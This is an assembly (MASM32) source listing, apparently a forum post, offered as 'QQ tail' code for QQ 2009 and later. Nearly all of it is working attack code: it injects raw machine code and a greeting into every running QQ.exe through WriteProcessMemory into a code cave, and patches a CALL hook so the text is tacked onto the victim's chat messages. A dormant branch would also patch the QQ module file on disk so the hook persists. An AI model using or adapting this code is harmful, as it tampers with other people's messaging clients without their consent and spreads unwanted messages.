QQ尾巴源码[2009版以上通杀],别拿去做坏事[ASM版]

 
我衷心的祝福大家在新的一年里工作顺利;心想事成;万事如意!
2010年新年快乐~\(�R��Q)/~
BY: Dream Flyer

 
 

.386
.model flat, stdcall
option casemap :none

include windows.inc
include user32.inc
include kernel32.inc
include masm32.inc
include gdi32.inc
include shlwapi.inc

includelib gdi32.lib
includelib shlwapi
includelib user32.lib
includelib kernel32.lib
includelib masm32.lib
include macro.asm
    MemSearch PROTO : DWORD,:DWORD,:DWORD,:DWORD
    ZjSearch    PROTO : DWORD,:DWORD,:DWORD,:DWORD,:DWORD
    GetModuleAddr Proto:DWORD,:DWORD
    HookQQChat Proto:DWORD,:DWORD
    AnsiToUnicode proto:DWORD
    UnicodeToUtf8 proto:DWORD
    AnsiToUtf8 proto:DWORD
    UniCodeLen proto:DWORD
    StartProc proto
.data
; Detection note: the fixed byte tables below (Zl, Code) are static
; signatures for this sample; nothing in them is generated at run time.
; Zl: 12-byte pattern that HookQQChat searches for inside the target's
; common.dll (via MemSearch). The hook site is 2 bytes past the hit.
         Zl db 255, 210, 137, 93, 16, 139, 78, 76, 141, 69, 16, 80    
; Code .. ____________: 227 bytes (Codelen) of raw machine code.
; HookQQChat copies it to a buffer, patches a 16-bit text length into it
; at offset 95, appends the UTF-8 text after it and writes the whole thing
; into the target. The bytes are not disassembled here.
         Code db 131, 248, 1, 15, 133, 210, 0, 0, 0, 96
                _     db 139, 69, 236, 139, 64, 12, 139, 72, 4    
                __     db 129, 249, 1, 77, 83, 71, 116, 18, 139, 72, 16, 129, 249
                ___     db 0, 77, 83, 71, 15, 133, 176, 0, 0, 0, 131, 192, 12, 129, 120, 41    
                ____     db 9, 1, 0, 1, 15, 132, 160, 0, 0, 0, 128, 120, 252, 2, 15, 132, 150, 0, 0, 0    
                _____    db 128, 120, 42, 2, 15, 132, 140, 0, 0, 0, 51, 201, 249, 114, 4, 102, 135, 88, 43    
                ______    db 102, 139, 80, 43, 134, 242, 102, 185, 101, 0, 102, 3, 209, 134, 242, 102, 137, 80
                _______ db 43, 131, 251, 0, 139, 209, 81, 139, 72, 40, 116, 13, 134, 214, 102, 137, 80, 43, 134
                ________    db 214, 131, 194, 3, 51, 201, 134, 205, 102, 3, 209, 134, 214, 102, 137, 80, 40, 131, 233, 3
                _________    db 119, 2, 51, 201, 129, 225, 255, 255, 0, 0, 141, 124, 8, 45, 89, 232, 0, 0, 0, 0, 88, 131, 192, 63
                __________    db 139, 240, 81, 243, 164, 89, 139, 69, 236, 131, 251, 0, 116, 5, 134, 251, 102, 43, 203, 102, 1, 72, 4
                ___________    db 139, 64, 12, 139, 80, 4, 129, 250, 1, 77, 83, 71, 116, 13, 139, 80, 5, 134, 242, 102, 3, 209, 134, 242
                ____________    db 137, 80, 5, 97, 137, 93, 16, 139, 78, 76, 195, 144
         Codelen dd 227 ;author's note: could also be derived as Codelen-Code
     posBuffer db 10 dup (0)          ;scratch for the commented-out wsprintf debugging lines
     ModAddr dd ?                     ;common.dll base + 1000h, set in HookQQChat
     ModName db "common.dll",0        ;module looked up inside the target process
     QQ            db "QQ.exe",0      ;target image name, matched case-insensitively
; Six bytes written at the hook site: E8 <rel32> 90, i.e. CALL rel32
; followed by a NOP. ADDR_ is computed by HookQQChat (target - site - 5).
     Call_     db    232
     ADDR_     dd ?
     NOP_        db 144
; Text appended after Code; HookQQChat converts it CP936 -> UTF-16 -> UTF-8.
     STR_        db    13,10,"我衷心的祝福大家在新的一年里工作顺利;心想事成;万事如意!",13,10
     STR__     db        "2010年新年快乐~\(�R��Q)/~",13,10
     STR___    db                "            BY: Dream Flyer",0
     Wjgr        db 0                ;if 1: also patch the QQ module file on disk so it triggers by itself next run.
                                     ;Initialised to 0 and never written anywhere in this listing.
     szModulePath db 256 dup(?)      ;set by GetModuleAddr: module directory + "Dream Flyer.dll"
         ModulePath db 256 dup(?)    ;set by GetModuleAddr: full path of the matched module
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>hard-coded values removed
                ;BY: Dream Flyer
                ;EMail:[email protected]
.data?

    
.CODE
START:        
; Entry point: walk the process list once (StartProc), then exit.
; The process itself does nothing else; all injection is in HookQQChat.
;<<<<<<<<<<<<<<<<<<<<<<<<<<<<
invoke StartProc        ;||
invoke ExitProcess,0     ;||
;<<<<<<<<<<<<<<<<<<<<<<<<<<<<
StartProc proc    
; Enumerate running processes with a Toolhelp snapshot and call
; HookQQChat for every process whose image name is QQ.exe.
; ABI:  stdcall, no parameters; HookQQChat's return code is ignored.
; NOTE(review): neither the snapshot handle nor the Process32First
; result is checked; .repeat runs the body once before testing, so on
; failure the uninitialised info struct would be compared once.
        LOCAL    info:PROCESSENTRY32
            LOCAL    handle:HANDLE
            invoke CreateToolhelp32Snapshot,TH32CS_SNAPPROCESS,0 ;process snapshot
            mov        handle,eax
            mov        info.dwSize,sizeof PROCESSENTRY32
            invoke Process32First,handle,addr info
        .repeat
                invoke lstrcmpi,addr info.szExeFile,addr QQ ;is this the process name we want? (case-insensitive)
                .if !eax
                invoke HookQQChat, info.th32ProcessID,addr STR_;hook every QQ process found
;             invoke wsprintf, addr posBuffer,CTXT("%d"),info.th32ProcessID ;convert to text (debug, disabled)
;            invoke MessageBoxA,0,addr posBuffer,CTXT("地址:"),MB_OK
                .endif
                invoke Process32Next,handle,addr info
            .until !eax
            invoke CloseHandle,handle
            ret
StartProc endp

HookQQChat proc PID,ChatText
; Cross-process code injection into one QQ.exe instance:
;   1. OpenProcess(PROCESS_ALL_ACCESS) on PID.
;   2. Locate common.dll in the target (GetModuleAddr) and search from
;      base+1000h for the 12-byte Zl pattern; HookAddr = hit + 2.
;   3. Build Code + UTF-8(ChatText) in a local buffer, then search the
;      same module for an all-zero run of the same length (a code cave).
;   4. VirtualProtectEx + WriteProcessMemory the buffer into the cave,
;      then overwrite 6 bytes at HookAddr with CALL rel32 / NOP
;      (Call_, ADDR_, NOP_) pointing at the cave.
;   5. If Wjgr==1, repeat both writes into the module file on disk.
; In:   PID = target process id; ChatText = CP936 ANSI text to append.
; Out:  eax = 1 success; 0 OpenProcess or first GlobalAlloc failed;
;       2 Zl not found; 3 no cave found; 5 VirtualProtectEx failed;
;       4 cave write short. A short write of the 6-byte hook still
;       returns 1.
; Detection note: OpenProcess(1F0FFFh) followed by VirtualProtectEx
; (PAGE_READWRITE) and WriteProcessMemory against QQ.exe, and a file
; named "Dream Flyer.dll" next to common.dll when the file branch runs,
; are the observable behaviours of this routine.
; NOTE(review): the paths that jump to exit_ (codes 2, 3, 5 and the
; OpenProcess failure) skip the CloseHandle at end__; none of the
; GlobalAlloc buffers are ever freed.
local Rpid,HookAddr,Utf8,Utf8Len,CodeAddr,NullData,AllLen,Bh_,Openf:OFSTRUCT,Hfile
invoke OpenProcess, 2035711, 0, PID    ;2035711 = 1F0FFFh = PROCESS_ALL_ACCESS (pre-Vista value), no inheritance
.if eax == 0 ;OpenProcess failed: return with eax = 0
     jmp exit_
.endif
    mov Rpid,eax;keep the process handle
     invoke GetModuleAddr,PID,addr ModName
add eax,1000H   ;searches start 1000h past the module base
mov ModAddr,eax
invoke MemSearch,PID,addr Zl, ModAddr,12 ;12 = length of Zl; returns the hit address or a small error code
         ; invoke wsprintf, addr posBuffer,CTXT("%lX"),eax ;convert to text (debug, disabled)
         ; invoke MessageBoxA,0,addr posBuffer,CTXT("地址:"),MB_OK
mov HookAddr,eax
            xor ax,ax    ;mask off the low 16 bits; only the high half is tested
            cmp eax,0
            mov eax,2    ;return code (mov leaves the flags alone)
            je exit_ ; result below 10000h (i.e. a MemSearch error code) -> pattern not found
add HookAddr,2    ;hook site = pattern hit + 2
invoke GlobalAlloc,GMEM_FIXED,Codelen   ;buffer sized for Code only (see the append below)
.if eax!=0
     mov CodeAddr,eax
     invoke RtlMoveMemory,CodeAddr,addr Code,Codelen
     invoke AnsiToUtf8,ChatText
     mov Utf8,eax
     invoke lstrlen,eax;UTF-8 byte length (author: "after hard-coding, some code was deleted")
     mov Utf8Len,eax;(author: "hard-coded here so nobody can change AX to the content length")
     mov ecx,CodeAddr
     push ecx
     add ecx,95
     mov WORD ptr [ecx],ax;patch the 16-bit text length into Code at offset 95
     pop ecx
     add ecx,Codelen
     invoke RtlMoveMemory,ecx,Utf8,Utf8Len   ;append the text right after Code.
                                             ;NOTE(review): CodeAddr holds Codelen bytes only, so this
                                             ;write lands past the end of that allocation.
     mov eax,Codelen
     add eax,Utf8Len
     mov AllLen,eax           ;AllLen = Codelen + Utf8Len
     push eax
     invoke GlobalAlloc,GMEM_FIXED,eax
     pop ecx
     push eax
     invoke RtlZeroMemory,eax,ecx   ;AllLen zero bytes = the pattern for the cave search; result unchecked
     pop eax
     invoke MemSearch,PID,eax, ModAddr,AllLen ;find a zero-filled run of AllLen bytes in the module
     mov NullData,eax
            xor ax,ax    ;same masked check as for HookAddr
            cmp eax,0
            mov eax,3 ;return code
            je exit_ ; no cave found
     add NullData,2 ;cave address = hit + 2
     invoke VirtualProtectEx,Rpid,NullData,AllLen,4,addr Bh_    ;4 = PAGE_READWRITE; old protection -> Bh_
     cmp eax,0
     mov eax,5;return code
     je exit_
     invoke WriteProcessMemory,Rpid,NullData,CodeAddr,AllLen,addr Bh_   ;Bh_ = bytes written
     xor eax,eax
     mov eax,4 ;return code
     sub Bh_,2
     jb end__ ;fewer than 2 bytes written -> failure
     invoke VirtualProtectEx,Rpid, HookAddr, 6, 4, addr Bh_   ;result not checked
     mov eax,NullData
     sub eax,HookAddr
     sub eax,5             ;rel32 for CALL: target - (HookAddr + 5)
     mov ADDR_,eax
     invoke WriteProcessMemory,Rpid,HookAddr,addr Call_, 6, addr Bh_   ;E8 rel32 90 at the hook site
     xor eax,eax
     inc eax ;return code 1 = success
     sub Bh_,2
     jb end__ ;short write; eax is already 1, so the caller cannot tell
     .if Wjgr==1 ;QQ file infection (unreachable in this listing: Wjgr is never set to 1)
        invoke PathFileExists,addr szModulePath;author: "file exists -> already infected"
                                               ;(the branch below runs when it exists, which contradicts that note)
        .if eax
                invoke MoveFile,addr ModulePath,addr szModulePath   ;rename the original module to the "Dream Flyer.dll" path
            invoke CopyFile,addr szModulePath,addr ModulePath,0     ;copy it back under the original name
            invoke OpenFile,addr ModulePath,addr Openf,OF_READWRITE
            mov Hfile,eax
            mov eax,NullData
            and eax,0ffffffH ;low 24 bits of the address used as file offset (mapping assumption not verified here)
            invoke SetFilePointer ,Hfile,eax,NULL,FILE_BEGIN
            invoke WriteFile,Hfile,CodeAddr,AllLen,addr Bh_,NULL
            mov eax,HookAddr
            and eax,0ffffffH
            invoke SetFilePointer ,Hfile,eax,NULL,FILE_BEGIN
            invoke WriteFile,Hfile,addr Call_ ,6,addr Bh_,NULL
            invoke CloseHandle,Hfile
            
        .endif
        
     .endif
.endif    
end__:
push eax        ;keep the return code across CloseHandle
invoke CloseHandle,Rpid
     pop eax
    exit_:ret   ;jumps straight here bypass the CloseHandle above
HookQQChat endp

AnsiToUnicode proc Ansi
; Convert a NUL-terminated CP936 (GBK) string to UTF-16.
; In:  Ansi = pointer to the ANSI string.
; Out: eax = GlobalAlloc'd UTF-16 buffer (never freed by the callers in
;      this listing), or 0 when GlobalAlloc fails (eax is still 0 then).
local len,UnicodeAddr
invoke MultiByteToWideChar,936,0,Ansi,-1,0,0   ;-1: length includes the terminator; returns the wide-char count
shl eax,1 ;x2 -> byte size
mov len,eax
invoke GlobalAlloc,GMEM_FIXED,len
.if eax!=0
    mov UnicodeAddr,eax
    invoke MultiByteToWideChar ,936, 0, Ansi, -1, eax, len   ;passes the byte size where a wide-char count is expected (overstates capacity; the buffer is len bytes)
    mov eax,UnicodeAddr
.endif
ret
AnsiToUnicode endp
;<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<UnicodeToUtf8
UnicodeToUtf8 proc Unicode
; Convert a NUL-terminated UTF-16 string to UTF-8 (code page 65001).
; In:  Unicode = pointer to the UTF-16 string.
; Out: eax = GlobalAlloc'd UTF-8 buffer, NUL-terminated by the second
;      call (-1), or whatever GlobalAlloc returned (0 is not checked; the
;      conversion is still attempted into it).
; NOTE(review): the sizing call passes UniCodeLen's count as cchWideChar.
; UniCodeLen counts non-ASCII code units twice, so for such text it can
; overstate the length and read past the terminator; for pure-ASCII text
; the count excludes the terminator while the second call (-1) includes
; it, so that call can come up one byte short.
local utf8_len
invoke UniCodeLen,Unicode
invoke WideCharToMultiByte,65001, 0, Unicode, eax, 0, 0, 0, 0   ;size query with an explicit length
mov utf8_len,eax
invoke GlobalAlloc,GMEM_FIXED,eax   ;result unchecked
push eax
invoke WideCharToMultiByte,65001, 0, Unicode, -1, eax, utf8_len, 0, 0   ;real conversion, terminator included
pop eax
ret
UnicodeToUtf8 endp
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
AnsiToUtf8 Proc Ansi
; CP936 -> UTF-16 -> UTF-8; returns the UTF-8 buffer in eax.
; The intermediate UTF-16 buffer is never freed, and a 0 from
; AnsiToUnicode is passed straight on (UniCodeLen would then read
; from address 0).
     invoke AnsiToUnicode,Ansi
     invoke UnicodeToUtf8,eax
ret
AnsiToUtf8 endp

UniCodeLen proc uses ebx Unicode
; Walk a NUL-terminated UTF-16 string and return a count in eax:
; +1 for every non-zero code unit, and +1 more when that unit's high
; byte is non-zero. It therefore equals the code-unit length only for
; ASCII-range text.
; In:  Unicode, read via [ebp+8H] (with 'uses ebx' the push happens
;      after mov ebp,esp, so the first argument is still at ebp+8).
; Clobbers ecx; ebx is saved/restored by 'uses'.
    xor         eax, eax
    mov ecx,[ebp+8H]                ;ecx = cursor into the string
L001:
    cmp         WORD ptr [ecx], 0   ;terminator?
    je L011
    inc         eax
    xor         ebx, ebx
    mov         bx, WORD ptr [ecx]
    cmp         bh, 0               ;high byte set -> count this unit twice
    je L009
    inc         eax
L009:
    add         ecx, 2
    jmp L001
L011:
ret
UniCodeLen endp
;===================================================================================搜索进程内存
MemSearch proc PID,TXT,Start,TXTlen
; Search the address space of process PID, from Start upwards, for the
; TXTlen bytes at TXT. Walks regions with VirtualQueryEx, copies each
; one with ReadProcessMemory and runs ZjSearch on the copy.
; In:  PID, TXT = pattern, Start = first address, TXTlen = pattern length.
; Out: eax = address of the match (Start + 1-based hit - 1), or a small
;      code: 1 OpenProcess failed, 4 VirtualQueryEx failed (this is also
;      how the walk ends). Codes 2 and 3 are set but overwritten on the
;      next pass. Callers tell the two apart by magnitude (HookQQChat
;      masks the low 16 bits).
; NOTE(review): opens the target a second time although HookQQChat already
; holds a handle; each region buffer is GlobalAlloc'd and never freed;
; Start is never reset to Men.BaseAddress, so a read can straddle region
; boundaries; on the OpenProcess failure path CloseHandle is called with
; an uninitialised Rpid.
local Rpid,DataBuff,Wz
local Men:MEMORY_BASIC_INFORMATION
invoke OpenProcess, 2035711,0, PID    ;1F0FFFh = PROCESS_ALL_ACCESS (pre-Vista value)
.if eax != 0
     mov Rpid,eax;keep the handle
     @1:
     invoke VirtualQueryEx, Rpid,Start,addr Men,28 ;region info; 28 = sizeof MEMORY_BASIC_INFORMATION (x86)
         .if eax != 0
                invoke GlobalAlloc,GMEM_FIXED,Men.RegionSize
                 .if eax != 0 ;allocation succeeded
                     mov DataBuff,eax ;local copy of the region
                         invoke ReadProcessMemory ,Rpid,Start,eax,Men.RegionSize ,0 ;copy the region (bytes-read pointer omitted)
                                 .if eax!=0 ;got data
                                    invoke ZjSearch, DataBuff,TXT,1,Men.RegionSize, TXTlen;look for the pattern
                                         .if eax!=-1 ;found
                                            mov Wz,eax ;1-based position within the copy
                                            invoke CloseHandle, Rpid ;close the handle
                                            mov eax,Wz
                                            add eax,Start
                                            dec eax    ;1-based -> absolute address
                                            jmp END_ ;return on first hit (skips the CloseHandle below)
                                         .endif
                             .else
                            add ax,3 ;EAX=3 error code (overwritten by the next pass)
                                 .endif
                                    
                         .else
                        ;allocation failed
                        add ax,2 ;EAX=2 error code (overwritten by the next pass)
                        .endif
             mov eax,Men.RegionSize
                 add Start,eax ;Start += region size (not aligned to BaseAddress)
                 jmp @1 ;next region
         .else
            add ax,4;EAX=4 error code: query failed, walk ends here
             .endif    
                
    .else
        inc eax    ;EAX=1 error code: OpenProcess failed
.endif
push eax
invoke CloseHandle, Rpid ;close the handle (Rpid uninitialised when OpenProcess failed)
pop eax
END_:ret
MemSearch endp
;==============================================================================================
    ZjSearch proc uses edi esi edx ebx Zj1,Zj2,Start,leng1,leng2; byte-set search (memmem-style)
; Find the leng2 bytes at Zj2 inside the leng1 bytes at Zj1, beginning at
; 1-based position Start (values below 1 are treated as 1).
; Out: eax = 1-based position of the first match, or -1 (0FFFFFFFFh) when
;      not found or on bad input (null pointer, length <= 0, pattern
;      longer than the remaining haystack).
; Arguments are read by frame offset: [ebp+8]=Zj1, [ebp+0C]=Zj2,
; [ebp+10]=Start, [ebp+14]=leng1, [ebp+18]=leng2.
; NOTE(review): the proc declares no LOCALs, so the [ebp-4], [ebp-8] and
; [ebp-0C] temporaries below are the slots where 'uses' pushed edi, esi
; and edx (MASM pushes the list in the order written). The epilogue then
; restores those clobbered values, so esi/edi are not preserved for the
; caller as stdcall requires. Harmless for the MASM-generated callers in
; this file, but an ABI violation.
        mov         edi,    [ebp+8H]        ;edi = haystack
        test        edi, edi
        je L059
        mov         ebx,    [ebp+14H]       ;ebx = haystack length
        cmp         ebx, 0
        jle L059
        mov         edx,    edi
        mov         esi,    [ebp+0CH]       ;esi = needle
        test        esi, esi
        je L059
        mov         ecx,    [ebp+18H]       ;ecx = needle length
        cmp         ecx, 0
        jle L059
        mov         eax, esi
        mov         [ebp-0CH], eax          ;[ebp-0C] = needle pointer (reloaded per candidate)
        mov         eax,    [ebp+10H]
        dec         eax                     ;Start -> 0-based offset, clamped at 0
        cmp         eax, 0
        jge L022
        xor         eax, eax
    L022:
        mov         [ebp+10H], eax          ;Start slot now holds the 0-based offset
        sub         ebx, eax                ;ebx = bytes left in the haystack
        cmp         ecx, ebx
        jg L059                             ;needle longer than what is left
        dec         ecx
        mov            [ebp-8], ecx         ;[ebp-8] = needle length - 1
        sub         ebx, ecx
        mov            [ebp-4], ebx         ;[ebp-4] = number of candidate start positions
        add         edx, eax                ;edx = haystack + offset
    L031:
        mov         esi, [ebp-0CH]
        mov         edi, edx
        mov         ecx, ebx                ;ecx = candidates remaining
        mov         ah, [esi]               ;ah = first needle byte
        inc         esi
    L036:
        jecxz L059                          ;no candidates left -> not found
        mov         al,    [edi]
        inc         edi
        dec         ecx
        xor         al, ah
        jnz L036                            ;scan for the first byte
        mov         edx, edi                ;resume point if the rest does not match
        mov         ebx, ecx
        mov         ecx,    [ebp-8H]
        jecxz L055                          ;single-byte needle: done
L046:     mov         ah,    [esi]
        mov         al,    [edi]
        inc         esi
        inc         edi
        xor         al, ah
        jnz L031                            ;mismatch: next candidate
        dec         ecx
        jecxz L055                          ;all remaining bytes matched
        jmp L046
L055:     mov         eax,    [ebp+10H]     ;offset + (candidates - remaining) = 1-based position
        add         eax,    [ebp-4H]
        sub         eax, ebx
        jmp         end_
L059:     or            eax, 0FFFFFFFFH     ;not found / bad input -> -1
     end_:ret
    ZjSearch endp
;==============================================================================搜索字节集结束
     GetModuleAddr proc PID,ModNameAddr ;base address of a module inside another process
; Find module ModNameAddr (case-insensitive) in process PID via a Toolhelp
; module snapshot (8 = TH32CS_SNAPMODULE).
; Out: eax = Module.hModule (base address) when found. When not found,
;      eax is CloseHandle's return value. Per the API contract the
;      snapshot call fails with INVALID_HANDLE_VALUE, which the
;      .if eax == 0 test does not catch.
; Side effects on a match (consumed by HookQQChat's file branch):
;   szModulePath = module directory + "Dream Flyer.dll"
;   ModulePath   = full path of the module.
; NOTE(review): RtlZeroMemory clears 200h bytes but szModulePath is 256
; bytes, so the zeroing also runs into the adjacent ModulePath (which is
; rewritten right after); the snapshot handle is not closed on the found
; path because jmp End_ skips @2.
     local Snapshot:HANDLE,Module:MODULEENTRY32
     invoke CreateToolhelp32Snapshot,8,PID
        .if eax == 0
         jmp End_
        .endif
        mov Module.dwSize,sizeof MODULEENTRY32
        mov Snapshot,eax ;keep the snapshot handle
        invoke Module32First,Snapshot,addr Module
        @3:cmp eax,0
        je    @2
         invoke lstrcmpi,ModNameAddr,addr Module.szModule
         .if!eax
            invoke lstrlen, addr Module.szModule
            push eax
            invoke lstrlen, addr Module.szExePath
            pop ecx
            sub eax,ecx ;directory length (path length - file name length)
            push eax
            invoke RtlZeroMemory,addr szModulePath,200H;clear first (200h > the 256-byte buffer)
            mov eax,[esp]
            invoke RtlMoveMemory,addr szModulePath,addr Module.szExePath,eax   ;copy the directory prefix
            invoke lstrlen, addr Module.szExePath
            invoke RtlMoveMemory,addr ModulePath,addr Module.szExePath,eax     ;copy the full path
            pop ecx
            mov eax,offset szModulePath
            add eax,ecx
            invoke RtlMoveMemory,eax,CTXT("Dream Flyer.dll"),15   ;15 = length without NUL; buffer was zeroed
;            invoke MessageBox,NULL,addr szModulePath,CTXT("123"),MB_OK
;            invoke MessageBox,NULL,addr     ModulePath,CTXT("123"),MB_OK
                mov eax,Module.hModule ;module base address
            jmp End_   ;skips CloseHandle at @2
         .endif
         invoke Module32Next,Snapshot,addr Module
         jmp @3
     @2:invoke CloseHandle,Snapshot
     End_:ret
     GetModuleAddr endp
;===================================================================取模块地址结束
end START
